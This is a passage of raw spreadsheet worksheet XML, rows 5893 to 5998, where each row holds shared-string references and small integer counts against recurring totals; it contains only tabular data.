      <c r="C5893">
        <v>0</v>
      </c>
      <c r="D5893">
        <v>992</v>
      </c>
    </row>
    <row r="5894" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5894" t="s">
        <v>16229</v>
      </c>
      <c r="B5894" t="s">
        <v>16221</v>
      </c>
      <c r="C5894">
        <v>23</v>
      </c>
      <c r="D5894">
        <v>992</v>
      </c>
    </row>
    <row r="5895" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5895" t="s">
        <v>16230</v>
      </c>
      <c r="B5895" t="s">
        <v>16222</v>
      </c>
      <c r="C5895">
        <v>12</v>
      </c>
      <c r="D5895">
        <v>992</v>
      </c>
    </row>
    <row r="5896" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5896" t="s">
        <v>16223</v>
      </c>
      <c r="B5896" t="s">
        <v>16223</v>
      </c>
      <c r="C5896">
        <v>30</v>
      </c>
      <c r="D5896">
        <v>992</v>
      </c>
    </row>
    <row r="5897" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5897" t="s">
        <v>16224</v>
      </c>
      <c r="B5897" t="s">
        <v>16224</v>
      </c>
      <c r="C5897">
        <v>0</v>
      </c>
      <c r="D5897">
        <v>992</v>
      </c>
    </row>
    <row r="5898" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5898" t="s">
        <v>16231</v>
      </c>
      <c r="B5898" t="s">
        <v>16216</v>
      </c>
      <c r="C5898">
        <v>10</v>
      </c>
      <c r="D5898">
        <v>2719</v>
      </c>
    </row>
    <row r="5899" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5899" t="s">
        <v>16228</v>
      </c>
      <c r="B5899" t="s">
        <v>16217</v>
      </c>
      <c r="C5899">
        <v>75</v>
      </c>
      <c r="D5899">
        <v>2719</v>
      </c>
    </row>
    <row r="5900" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5900" t="s">
        <v>16231</v>
      </c>
      <c r="B5900" t="s">
        <v>16218</v>
      </c>
      <c r="C5900">
        <v>103</v>
      </c>
      <c r="D5900">
        <v>2719</v>
      </c>
    </row>
    <row r="5901" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5901" t="s">
        <v>16230</v>
      </c>
      <c r="B5901" t="s">
        <v>16220</v>
      </c>
      <c r="C5901">
        <v>15</v>
      </c>
      <c r="D5901">
        <v>2719</v>
      </c>
    </row>
    <row r="5902" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5902" t="s">
        <v>16229</v>
      </c>
      <c r="B5902" t="s">
        <v>16221</v>
      </c>
      <c r="C5902">
        <v>150</v>
      </c>
      <c r="D5902">
        <v>2719</v>
      </c>
    </row>
    <row r="5903" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5903" t="s">
        <v>16230</v>
      </c>
      <c r="B5903" t="s">
        <v>16222</v>
      </c>
      <c r="C5903">
        <v>300</v>
      </c>
      <c r="D5903">
        <v>2719</v>
      </c>
    </row>
    <row r="5904" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5904" t="s">
        <v>16228</v>
      </c>
      <c r="B5904" t="s">
        <v>16211</v>
      </c>
      <c r="C5904">
        <v>0</v>
      </c>
      <c r="D5904">
        <v>1000</v>
      </c>
    </row>
    <row r="5905" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5905" t="s">
        <v>16231</v>
      </c>
      <c r="B5905" t="s">
        <v>16212</v>
      </c>
      <c r="C5905">
        <v>0</v>
      </c>
      <c r="D5905">
        <v>1000</v>
      </c>
    </row>
    <row r="5906" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5906" t="s">
        <v>16228</v>
      </c>
      <c r="B5906" t="s">
        <v>16213</v>
      </c>
      <c r="C5906">
        <v>0</v>
      </c>
      <c r="D5906">
        <v>1000</v>
      </c>
    </row>
    <row r="5907" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5907" t="s">
        <v>16231</v>
      </c>
      <c r="B5907" t="s">
        <v>16214</v>
      </c>
      <c r="C5907">
        <v>0</v>
      </c>
      <c r="D5907">
        <v>1000</v>
      </c>
    </row>
    <row r="5908" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5908" t="s">
        <v>16228</v>
      </c>
      <c r="B5908" t="s">
        <v>16215</v>
      </c>
      <c r="C5908">
        <v>1</v>
      </c>
      <c r="D5908">
        <v>1000</v>
      </c>
    </row>
    <row r="5909" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5909" t="s">
        <v>16231</v>
      </c>
      <c r="B5909" t="s">
        <v>16216</v>
      </c>
      <c r="C5909">
        <v>1</v>
      </c>
      <c r="D5909">
        <v>1000</v>
      </c>
    </row>
    <row r="5910" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5910" t="s">
        <v>16228</v>
      </c>
      <c r="B5910" t="s">
        <v>16217</v>
      </c>
      <c r="C5910">
        <v>3</v>
      </c>
      <c r="D5910">
        <v>1000</v>
      </c>
    </row>
    <row r="5911" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5911" t="s">
        <v>16231</v>
      </c>
      <c r="B5911" t="s">
        <v>16218</v>
      </c>
      <c r="C5911">
        <v>0</v>
      </c>
      <c r="D5911">
        <v>1000</v>
      </c>
    </row>
    <row r="5912" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5912" t="s">
        <v>16229</v>
      </c>
      <c r="B5912" t="s">
        <v>16219</v>
      </c>
      <c r="C5912">
        <v>1</v>
      </c>
      <c r="D5912">
        <v>1000</v>
      </c>
    </row>
    <row r="5913" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5913" t="s">
        <v>16230</v>
      </c>
      <c r="B5913" t="s">
        <v>16220</v>
      </c>
      <c r="C5913">
        <v>1</v>
      </c>
      <c r="D5913">
        <v>1000</v>
      </c>
    </row>
    <row r="5914" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5914" t="s">
        <v>16229</v>
      </c>
      <c r="B5914" t="s">
        <v>16221</v>
      </c>
      <c r="C5914">
        <v>3</v>
      </c>
      <c r="D5914">
        <v>1000</v>
      </c>
    </row>
    <row r="5915" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5915" t="s">
        <v>16230</v>
      </c>
      <c r="B5915" t="s">
        <v>16222</v>
      </c>
      <c r="C5915">
        <v>0</v>
      </c>
      <c r="D5915">
        <v>1000</v>
      </c>
    </row>
    <row r="5916" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5916" t="s">
        <v>16223</v>
      </c>
      <c r="B5916" t="s">
        <v>16223</v>
      </c>
      <c r="C5916">
        <v>1</v>
      </c>
      <c r="D5916">
        <v>1000</v>
      </c>
    </row>
    <row r="5917" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5917" t="s">
        <v>16224</v>
      </c>
      <c r="B5917" t="s">
        <v>16224</v>
      </c>
      <c r="C5917">
        <v>1</v>
      </c>
      <c r="D5917">
        <v>1000</v>
      </c>
    </row>
    <row r="5918" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5918" t="s">
        <v>16228</v>
      </c>
      <c r="B5918" t="s">
        <v>16211</v>
      </c>
      <c r="C5918">
        <v>0</v>
      </c>
      <c r="D5918">
        <v>800</v>
      </c>
    </row>
    <row r="5919" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5919" t="s">
        <v>16231</v>
      </c>
      <c r="B5919" t="s">
        <v>16212</v>
      </c>
      <c r="C5919">
        <v>0</v>
      </c>
      <c r="D5919">
        <v>800</v>
      </c>
    </row>
    <row r="5920" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5920" t="s">
        <v>16228</v>
      </c>
      <c r="B5920" t="s">
        <v>16213</v>
      </c>
      <c r="C5920">
        <v>0</v>
      </c>
      <c r="D5920">
        <v>800</v>
      </c>
    </row>
    <row r="5921" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5921" t="s">
        <v>16231</v>
      </c>
      <c r="B5921" t="s">
        <v>16214</v>
      </c>
      <c r="C5921">
        <v>0</v>
      </c>
      <c r="D5921">
        <v>800</v>
      </c>
    </row>
    <row r="5922" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5922" t="s">
        <v>16228</v>
      </c>
      <c r="B5922" t="s">
        <v>16215</v>
      </c>
      <c r="C5922">
        <v>2</v>
      </c>
      <c r="D5922">
        <v>800</v>
      </c>
    </row>
    <row r="5923" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5923" t="s">
        <v>16231</v>
      </c>
      <c r="B5923" t="s">
        <v>16216</v>
      </c>
      <c r="C5923">
        <v>6</v>
      </c>
      <c r="D5923">
        <v>800</v>
      </c>
    </row>
    <row r="5924" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5924" t="s">
        <v>16228</v>
      </c>
      <c r="B5924" t="s">
        <v>16217</v>
      </c>
      <c r="C5924">
        <v>8</v>
      </c>
      <c r="D5924">
        <v>800</v>
      </c>
    </row>
    <row r="5925" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5925" t="s">
        <v>16231</v>
      </c>
      <c r="B5925" t="s">
        <v>16218</v>
      </c>
      <c r="C5925">
        <v>0</v>
      </c>
      <c r="D5925">
        <v>800</v>
      </c>
    </row>
    <row r="5926" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5926" t="s">
        <v>16229</v>
      </c>
      <c r="B5926" t="s">
        <v>16219</v>
      </c>
      <c r="C5926">
        <v>2</v>
      </c>
      <c r="D5926">
        <v>800</v>
      </c>
    </row>
    <row r="5927" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5927" t="s">
        <v>16230</v>
      </c>
      <c r="B5927" t="s">
        <v>16220</v>
      </c>
      <c r="C5927">
        <v>6</v>
      </c>
      <c r="D5927">
        <v>800</v>
      </c>
    </row>
    <row r="5928" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5928" t="s">
        <v>16229</v>
      </c>
      <c r="B5928" t="s">
        <v>16221</v>
      </c>
      <c r="C5928">
        <v>98</v>
      </c>
      <c r="D5928">
        <v>800</v>
      </c>
    </row>
    <row r="5929" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5929" t="s">
        <v>16230</v>
      </c>
      <c r="B5929" t="s">
        <v>16222</v>
      </c>
      <c r="C5929">
        <v>69</v>
      </c>
      <c r="D5929">
        <v>800</v>
      </c>
    </row>
    <row r="5930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5930" t="s">
        <v>16223</v>
      </c>
      <c r="B5930" t="s">
        <v>16223</v>
      </c>
      <c r="C5930">
        <v>25</v>
      </c>
      <c r="D5930">
        <v>800</v>
      </c>
    </row>
    <row r="5931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5931" t="s">
        <v>16224</v>
      </c>
      <c r="B5931" t="s">
        <v>16224</v>
      </c>
      <c r="C5931">
        <v>1</v>
      </c>
      <c r="D5931">
        <v>800</v>
      </c>
    </row>
    <row r="5932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5932" t="s">
        <v>16228</v>
      </c>
      <c r="B5932" t="s">
        <v>16211</v>
      </c>
      <c r="C5932">
        <v>0</v>
      </c>
      <c r="D5932">
        <v>458</v>
      </c>
    </row>
    <row r="5933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5933" t="s">
        <v>16231</v>
      </c>
      <c r="B5933" t="s">
        <v>16212</v>
      </c>
      <c r="C5933">
        <v>0</v>
      </c>
      <c r="D5933">
        <v>458</v>
      </c>
    </row>
    <row r="5934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5934" t="s">
        <v>16228</v>
      </c>
      <c r="B5934" t="s">
        <v>16213</v>
      </c>
      <c r="C5934">
        <v>0</v>
      </c>
      <c r="D5934">
        <v>458</v>
      </c>
    </row>
    <row r="5935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5935" t="s">
        <v>16231</v>
      </c>
      <c r="B5935" t="s">
        <v>16214</v>
      </c>
      <c r="C5935">
        <v>0</v>
      </c>
      <c r="D5935">
        <v>458</v>
      </c>
    </row>
    <row r="5936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5936" t="s">
        <v>16228</v>
      </c>
      <c r="B5936" t="s">
        <v>16215</v>
      </c>
      <c r="C5936">
        <v>1</v>
      </c>
      <c r="D5936">
        <v>458</v>
      </c>
    </row>
    <row r="5937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5937" t="s">
        <v>16231</v>
      </c>
      <c r="B5937" t="s">
        <v>16216</v>
      </c>
      <c r="C5937">
        <v>2</v>
      </c>
      <c r="D5937">
        <v>458</v>
      </c>
    </row>
    <row r="5938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5938" t="s">
        <v>16228</v>
      </c>
      <c r="B5938" t="s">
        <v>16217</v>
      </c>
      <c r="C5938">
        <v>9</v>
      </c>
      <c r="D5938">
        <v>458</v>
      </c>
    </row>
    <row r="5939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5939" t="s">
        <v>16231</v>
      </c>
      <c r="B5939" t="s">
        <v>16218</v>
      </c>
      <c r="C5939">
        <v>1</v>
      </c>
      <c r="D5939">
        <v>458</v>
      </c>
    </row>
    <row r="5940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5940" t="s">
        <v>16229</v>
      </c>
      <c r="B5940" t="s">
        <v>16219</v>
      </c>
      <c r="C5940">
        <v>0</v>
      </c>
      <c r="D5940">
        <v>458</v>
      </c>
    </row>
    <row r="5941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5941" t="s">
        <v>16230</v>
      </c>
      <c r="B5941" t="s">
        <v>16220</v>
      </c>
      <c r="C5941">
        <v>0</v>
      </c>
      <c r="D5941">
        <v>458</v>
      </c>
    </row>
    <row r="5942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5942" t="s">
        <v>16229</v>
      </c>
      <c r="B5942" t="s">
        <v>16221</v>
      </c>
      <c r="C5942">
        <v>3</v>
      </c>
      <c r="D5942">
        <v>458</v>
      </c>
    </row>
    <row r="5943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5943" t="s">
        <v>16230</v>
      </c>
      <c r="B5943" t="s">
        <v>16222</v>
      </c>
      <c r="C5943">
        <v>15</v>
      </c>
      <c r="D5943">
        <v>458</v>
      </c>
    </row>
    <row r="5944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5944" t="s">
        <v>16223</v>
      </c>
      <c r="B5944" t="s">
        <v>16223</v>
      </c>
      <c r="C5944">
        <v>15</v>
      </c>
      <c r="D5944">
        <v>458</v>
      </c>
    </row>
    <row r="5945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5945" t="s">
        <v>16224</v>
      </c>
      <c r="B5945" t="s">
        <v>16224</v>
      </c>
      <c r="C5945">
        <v>1</v>
      </c>
      <c r="D5945">
        <v>458</v>
      </c>
    </row>
    <row r="5946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5946" t="s">
        <v>16228</v>
      </c>
      <c r="B5946" t="s">
        <v>16211</v>
      </c>
      <c r="C5946">
        <v>0</v>
      </c>
      <c r="D5946">
        <v>608</v>
      </c>
    </row>
    <row r="5947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5947" t="s">
        <v>16231</v>
      </c>
      <c r="B5947" t="s">
        <v>16212</v>
      </c>
      <c r="C5947">
        <v>0</v>
      </c>
      <c r="D5947">
        <v>608</v>
      </c>
    </row>
    <row r="5948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5948" t="s">
        <v>16228</v>
      </c>
      <c r="B5948" t="s">
        <v>16213</v>
      </c>
      <c r="C5948">
        <v>0</v>
      </c>
      <c r="D5948">
        <v>608</v>
      </c>
    </row>
    <row r="5949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5949" t="s">
        <v>16231</v>
      </c>
      <c r="B5949" t="s">
        <v>16214</v>
      </c>
      <c r="C5949">
        <v>0</v>
      </c>
      <c r="D5949">
        <v>608</v>
      </c>
    </row>
    <row r="5950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5950" t="s">
        <v>16228</v>
      </c>
      <c r="B5950" t="s">
        <v>16215</v>
      </c>
      <c r="C5950">
        <v>1</v>
      </c>
      <c r="D5950">
        <v>608</v>
      </c>
    </row>
    <row r="5951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5951" t="s">
        <v>16231</v>
      </c>
      <c r="B5951" t="s">
        <v>16216</v>
      </c>
      <c r="C5951">
        <v>1</v>
      </c>
      <c r="D5951">
        <v>608</v>
      </c>
    </row>
    <row r="5952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5952" t="s">
        <v>16228</v>
      </c>
      <c r="B5952" t="s">
        <v>16217</v>
      </c>
      <c r="C5952">
        <v>2</v>
      </c>
      <c r="D5952">
        <v>608</v>
      </c>
    </row>
    <row r="5953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5953" t="s">
        <v>16231</v>
      </c>
      <c r="B5953" t="s">
        <v>16218</v>
      </c>
      <c r="C5953">
        <v>1</v>
      </c>
      <c r="D5953">
        <v>608</v>
      </c>
    </row>
    <row r="5954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5954" t="s">
        <v>16229</v>
      </c>
      <c r="B5954" t="s">
        <v>16219</v>
      </c>
      <c r="C5954">
        <v>0</v>
      </c>
      <c r="D5954">
        <v>608</v>
      </c>
    </row>
    <row r="5955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5955" t="s">
        <v>16230</v>
      </c>
      <c r="B5955" t="s">
        <v>16220</v>
      </c>
      <c r="C5955">
        <v>0</v>
      </c>
      <c r="D5955">
        <v>608</v>
      </c>
    </row>
    <row r="5956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5956" t="s">
        <v>16229</v>
      </c>
      <c r="B5956" t="s">
        <v>16221</v>
      </c>
      <c r="C5956">
        <v>5</v>
      </c>
      <c r="D5956">
        <v>608</v>
      </c>
    </row>
    <row r="5957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5957" t="s">
        <v>16230</v>
      </c>
      <c r="B5957" t="s">
        <v>16222</v>
      </c>
      <c r="C5957">
        <v>5</v>
      </c>
      <c r="D5957">
        <v>608</v>
      </c>
    </row>
    <row r="5958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5958" t="s">
        <v>16223</v>
      </c>
      <c r="B5958" t="s">
        <v>16223</v>
      </c>
      <c r="C5958">
        <v>26</v>
      </c>
      <c r="D5958">
        <v>608</v>
      </c>
    </row>
    <row r="5959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5959" t="s">
        <v>16224</v>
      </c>
      <c r="B5959" t="s">
        <v>16224</v>
      </c>
      <c r="C5959">
        <v>1</v>
      </c>
      <c r="D5959">
        <v>608</v>
      </c>
    </row>
    <row r="5960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5960" t="s">
        <v>16228</v>
      </c>
      <c r="B5960" t="s">
        <v>16211</v>
      </c>
      <c r="C5960">
        <v>0</v>
      </c>
      <c r="D5960">
        <v>2784</v>
      </c>
    </row>
    <row r="5961" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5961" t="s">
        <v>16231</v>
      </c>
      <c r="B5961" t="s">
        <v>16212</v>
      </c>
      <c r="C5961">
        <v>0</v>
      </c>
      <c r="D5961">
        <v>2784</v>
      </c>
    </row>
    <row r="5962" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5962" t="s">
        <v>16228</v>
      </c>
      <c r="B5962" t="s">
        <v>16213</v>
      </c>
      <c r="C5962">
        <v>28</v>
      </c>
      <c r="D5962">
        <v>2784</v>
      </c>
    </row>
    <row r="5963" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5963" t="s">
        <v>16231</v>
      </c>
      <c r="B5963" t="s">
        <v>16214</v>
      </c>
      <c r="C5963">
        <v>6</v>
      </c>
      <c r="D5963">
        <v>2784</v>
      </c>
    </row>
    <row r="5964" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5964" t="s">
        <v>16228</v>
      </c>
      <c r="B5964" t="s">
        <v>16215</v>
      </c>
      <c r="C5964">
        <v>0</v>
      </c>
      <c r="D5964">
        <v>2784</v>
      </c>
    </row>
    <row r="5965" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5965" t="s">
        <v>16231</v>
      </c>
      <c r="B5965" t="s">
        <v>16216</v>
      </c>
      <c r="C5965">
        <v>4</v>
      </c>
      <c r="D5965">
        <v>2784</v>
      </c>
    </row>
    <row r="5966" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5966" t="s">
        <v>16228</v>
      </c>
      <c r="B5966" t="s">
        <v>16217</v>
      </c>
      <c r="C5966">
        <v>6</v>
      </c>
      <c r="D5966">
        <v>2784</v>
      </c>
    </row>
    <row r="5967" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5967" t="s">
        <v>16231</v>
      </c>
      <c r="B5967" t="s">
        <v>16218</v>
      </c>
      <c r="C5967">
        <v>2</v>
      </c>
      <c r="D5967">
        <v>2784</v>
      </c>
    </row>
    <row r="5968" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5968" t="s">
        <v>16229</v>
      </c>
      <c r="B5968" t="s">
        <v>16219</v>
      </c>
      <c r="C5968">
        <v>0</v>
      </c>
      <c r="D5968">
        <v>2784</v>
      </c>
    </row>
    <row r="5969" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5969" t="s">
        <v>16230</v>
      </c>
      <c r="B5969" t="s">
        <v>16220</v>
      </c>
      <c r="C5969">
        <v>0</v>
      </c>
      <c r="D5969">
        <v>2784</v>
      </c>
    </row>
    <row r="5970" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5970" t="s">
        <v>16229</v>
      </c>
      <c r="B5970" t="s">
        <v>16221</v>
      </c>
      <c r="C5970">
        <v>22</v>
      </c>
      <c r="D5970">
        <v>2784</v>
      </c>
    </row>
    <row r="5971" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5971" t="s">
        <v>16230</v>
      </c>
      <c r="B5971" t="s">
        <v>16222</v>
      </c>
      <c r="C5971">
        <v>0</v>
      </c>
      <c r="D5971">
        <v>2784</v>
      </c>
    </row>
    <row r="5972" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5972" t="s">
        <v>16223</v>
      </c>
      <c r="B5972" t="s">
        <v>16223</v>
      </c>
      <c r="C5972">
        <v>24</v>
      </c>
      <c r="D5972">
        <v>2784</v>
      </c>
    </row>
    <row r="5973" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5973" t="s">
        <v>16224</v>
      </c>
      <c r="B5973" t="s">
        <v>16224</v>
      </c>
      <c r="C5973">
        <v>1</v>
      </c>
      <c r="D5973">
        <v>2784</v>
      </c>
    </row>
    <row r="5974" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5974" t="s">
        <v>16228</v>
      </c>
      <c r="B5974" t="s">
        <v>16211</v>
      </c>
      <c r="C5974">
        <v>0</v>
      </c>
      <c r="D5974">
        <v>768</v>
      </c>
    </row>
    <row r="5975" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5975" t="s">
        <v>16231</v>
      </c>
      <c r="B5975" t="s">
        <v>16212</v>
      </c>
      <c r="C5975">
        <v>0</v>
      </c>
      <c r="D5975">
        <v>768</v>
      </c>
    </row>
    <row r="5976" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5976" t="s">
        <v>16228</v>
      </c>
      <c r="B5976" t="s">
        <v>16213</v>
      </c>
      <c r="C5976">
        <v>0</v>
      </c>
      <c r="D5976">
        <v>768</v>
      </c>
    </row>
    <row r="5977" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5977" t="s">
        <v>16231</v>
      </c>
      <c r="B5977" t="s">
        <v>16214</v>
      </c>
      <c r="C5977">
        <v>0</v>
      </c>
      <c r="D5977">
        <v>768</v>
      </c>
    </row>
    <row r="5978" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5978" t="s">
        <v>16228</v>
      </c>
      <c r="B5978" t="s">
        <v>16215</v>
      </c>
      <c r="C5978">
        <v>1</v>
      </c>
      <c r="D5978">
        <v>768</v>
      </c>
    </row>
    <row r="5979" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5979" t="s">
        <v>16231</v>
      </c>
      <c r="B5979" t="s">
        <v>16216</v>
      </c>
      <c r="C5979">
        <v>3</v>
      </c>
      <c r="D5979">
        <v>768</v>
      </c>
    </row>
    <row r="5980" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5980" t="s">
        <v>16228</v>
      </c>
      <c r="B5980" t="s">
        <v>16217</v>
      </c>
      <c r="C5980">
        <v>1</v>
      </c>
      <c r="D5980">
        <v>768</v>
      </c>
    </row>
    <row r="5981" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5981" t="s">
        <v>16231</v>
      </c>
      <c r="B5981" t="s">
        <v>16218</v>
      </c>
      <c r="C5981">
        <v>1</v>
      </c>
      <c r="D5981">
        <v>768</v>
      </c>
    </row>
    <row r="5982" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5982" t="s">
        <v>16229</v>
      </c>
      <c r="B5982" t="s">
        <v>16219</v>
      </c>
      <c r="C5982">
        <v>0</v>
      </c>
      <c r="D5982">
        <v>768</v>
      </c>
    </row>
    <row r="5983" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5983" t="s">
        <v>16230</v>
      </c>
      <c r="B5983" t="s">
        <v>16220</v>
      </c>
      <c r="C5983">
        <v>0</v>
      </c>
      <c r="D5983">
        <v>768</v>
      </c>
    </row>
    <row r="5984" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5984" t="s">
        <v>16229</v>
      </c>
      <c r="B5984" t="s">
        <v>16221</v>
      </c>
      <c r="C5984">
        <v>0</v>
      </c>
      <c r="D5984">
        <v>768</v>
      </c>
    </row>
    <row r="5985" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5985" t="s">
        <v>16230</v>
      </c>
      <c r="B5985" t="s">
        <v>16222</v>
      </c>
      <c r="C5985">
        <v>0</v>
      </c>
      <c r="D5985">
        <v>768</v>
      </c>
    </row>
    <row r="5986" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5986" t="s">
        <v>16223</v>
      </c>
      <c r="B5986" t="s">
        <v>16223</v>
      </c>
      <c r="C5986">
        <v>0</v>
      </c>
      <c r="D5986">
        <v>768</v>
      </c>
    </row>
    <row r="5987" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5987" t="s">
        <v>16224</v>
      </c>
      <c r="B5987" t="s">
        <v>16224</v>
      </c>
      <c r="C5987">
        <v>0</v>
      </c>
      <c r="D5987">
        <v>768</v>
      </c>
    </row>
    <row r="5988" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5988" t="s">
        <v>16228</v>
      </c>
      <c r="B5988" t="s">
        <v>16211</v>
      </c>
      <c r="C5988">
        <v>0</v>
      </c>
      <c r="D5988">
        <v>520</v>
      </c>
    </row>
    <row r="5989" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5989" t="s">
        <v>16231</v>
      </c>
      <c r="B5989" t="s">
        <v>16212</v>
      </c>
      <c r="C5989">
        <v>0</v>
      </c>
      <c r="D5989">
        <v>520</v>
      </c>
    </row>
    <row r="5990" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5990" t="s">
        <v>16228</v>
      </c>
      <c r="B5990" t="s">
        <v>16213</v>
      </c>
      <c r="C5990">
        <v>0</v>
      </c>
      <c r="D5990">
        <v>520</v>
      </c>
    </row>
    <row r="5991" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5991" t="s">
        <v>16231</v>
      </c>
      <c r="B5991" t="s">
        <v>16214</v>
      </c>
      <c r="C5991">
        <v>0</v>
      </c>
      <c r="D5991">
        <v>520</v>
      </c>
    </row>
    <row r="5992" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5992" t="s">
        <v>16228</v>
      </c>
      <c r="B5992" t="s">
        <v>16215</v>
      </c>
      <c r="C5992">
        <v>0</v>
      </c>
      <c r="D5992">
        <v>520</v>
      </c>
    </row>
    <row r="5993" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5993" t="s">
        <v>16231</v>
      </c>
      <c r="B5993" t="s">
        <v>16216</v>
      </c>
      <c r="C5993">
        <v>2</v>
      </c>
      <c r="D5993">
        <v>520</v>
      </c>
    </row>
    <row r="5994" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5994" t="s">
        <v>16228</v>
      </c>
      <c r="B5994" t="s">
        <v>16217</v>
      </c>
      <c r="C5994">
        <v>1</v>
      </c>
      <c r="D5994">
        <v>520</v>
      </c>
    </row>
    <row r="5995" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5995" t="s">
        <v>16231</v>
      </c>
      <c r="B5995" t="s">
        <v>16218</v>
      </c>
      <c r="C5995">
        <v>0</v>
      </c>
      <c r="D5995">
        <v>520</v>
      </c>
    </row>
    <row r="5996" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5996" t="s">
        <v>16229</v>
      </c>
      <c r="B5996" t="s">
        <v>16219</v>
      </c>
      <c r="C5996">
        <v>0</v>
      </c>
      <c r="D5996">
        <v>520</v>
      </c>
    </row>
    <row r="5997" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5997" t="s">
        <v>16230</v>
      </c>
      <c r="B5997" t="s">
        <v>16220</v>
      </c>
      <c r="C5997">
        <v>0</v>
      </c>
      <c r="D5997">
        <v>520</v>
      </c>
    </row>
    <row r="5998" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5998" t="s">
        <v>16229</v>
      </c>
      <c r="B5998" t="s">
        <v>16221</v>
      </c>
      <c r="C5998">
        <v>12</v>
      </c>
      <c r="D5998">
        <v>520</v>
      </c>
    </row>
